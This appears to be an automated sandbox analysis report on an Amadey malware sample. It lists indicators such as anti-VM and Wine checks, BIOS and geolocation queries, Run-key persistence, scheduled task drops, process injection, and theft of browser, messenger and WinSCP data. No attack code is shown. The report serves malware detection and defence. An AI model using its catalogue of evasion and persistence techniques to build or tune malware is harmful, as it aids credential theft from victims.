amadey | acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	chrosha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	13ee951efa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
78	4968	rundll32.exe
79	1044	rundll32.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	13ee951efa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	chrosha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	13ee951efa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	chrosha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	explorta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	ee00809619.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	chrosha.exe

Executes dropped EXE 7 IoCs

pid	Process
4688	explorta.exe
4812	amert.exe
2428	ee00809619.exe
2272	13ee951efa.exe
2484	explorta.exe
3068	chrosha.exe
3428	explorta.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	chrosha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	13ee951efa.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	explorta.exe

Loads dropped DLL 3 IoCs

pid	Process
1712	rundll32.exe
4968	rundll32.exe
1044	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ee00809619.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\ee00809619.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\13ee951efa.exe = "C:\\Users\\Admin\\1000017002\\13ee951efa.exe"	explorta.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000700000002344b-57.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
3136	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
4688	explorta.exe
4812	amert.exe
2272	13ee951efa.exe
3068	chrosha.exe
2484	explorta.exe
3428	explorta.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorta.job	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
File created	C:\Windows\Tasks\chrosha.job	amert.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133587112625490842"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{E8B429F8-817C-4CC6-BB30-92DF7923D28C}	chrome.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
3136	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
3136	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
4688	explorta.exe
4688	explorta.exe
4812	amert.exe
4812	amert.exe
2364	chrome.exe
2364	chrome.exe
2272	13ee951efa.exe
2272	13ee951efa.exe
3068	chrosha.exe
3068	chrosha.exe
2484	explorta.exe
2484	explorta.exe
4968	rundll32.exe
4968	rundll32.exe
4968	rundll32.exe
4968	rundll32.exe
4968	rundll32.exe
4968	rundll32.exe
4968	rundll32.exe
4968	rundll32.exe
4968	rundll32.exe
4968	rundll32.exe
3520	powershell.exe
3520	powershell.exe
3520	powershell.exe
2364	chrome.exe
2364	chrome.exe
3428	explorta.exe
3428	explorta.exe
3248	chrome.exe
3248	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe
Token: SeShutdownPrivilege	2364	chrome.exe
Token: SeCreatePagefilePrivilege	2364	chrome.exe

Suspicious use of FindShellTrayWindow 63 IoCs

pid	Process
2428	ee00809619.exe
2428	ee00809619.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2428	ee00809619.exe
2364	chrome.exe
2428	ee00809619.exe
2428	ee00809619.exe
2364	chrome.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe

Suspicious use of SendNotifyMessage 60 IoCs

pid	Process
2428	ee00809619.exe
2428	ee00809619.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2364	chrome.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe
2428	ee00809619.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3136 wrote to memory of 4688	3136	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe	86
PID 3136 wrote to memory of 4688	3136	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe	86
PID 3136 wrote to memory of 4688	3136	acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe	86
PID 4688 wrote to memory of 2332	4688	explorta.exe	87
PID 4688 wrote to memory of 2332	4688	explorta.exe	87
PID 4688 wrote to memory of 2332	4688	explorta.exe	87
PID 4688 wrote to memory of 4812	4688	explorta.exe	88
PID 4688 wrote to memory of 4812	4688	explorta.exe	88
PID 4688 wrote to memory of 4812	4688	explorta.exe	88
PID 4688 wrote to memory of 2428	4688	explorta.exe	89
PID 4688 wrote to memory of 2428	4688	explorta.exe	89
PID 4688 wrote to memory of 2428	4688	explorta.exe	89
PID 2428 wrote to memory of 2364	2428	ee00809619.exe	90
PID 2428 wrote to memory of 2364	2428	ee00809619.exe	90
PID 2364 wrote to memory of 2500	2364	chrome.exe	92
PID 2364 wrote to memory of 2500	2364	chrome.exe	92
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 2740	2364	chrome.exe	93
PID 2364 wrote to memory of 952	2364	chrome.exe	94
PID 2364 wrote to memory of 952	2364	chrome.exe	94
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95
PID 2364 wrote to memory of 3500	2364	chrome.exe	95

C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
"C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3136
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4688
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    PID:2332
- - C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4812
- - C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe
    "C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2364
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaef08ab58,0x7ffaef08ab68,0x7ffaef08ab78
        5⤵
        
        PID:2500
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:2
        5⤵
        
        PID:2740
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:952
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:3500
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
        5⤵
        
        PID:4916
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
        5⤵
        
        PID:1680
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
        5⤵
        
        PID:4924
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3264 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
        5⤵
        
        PID:4664
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3328 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:2708
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        Modifies registry class
        
        PID:1584
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:4244
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:1840
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:3276
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:2176
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:528
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        5⤵
        
        PID:3048
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3248
- - C:\Users\Admin\1000017002\13ee951efa.exe
    "C:\Users\Admin\1000017002\13ee951efa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:2272

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3568

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
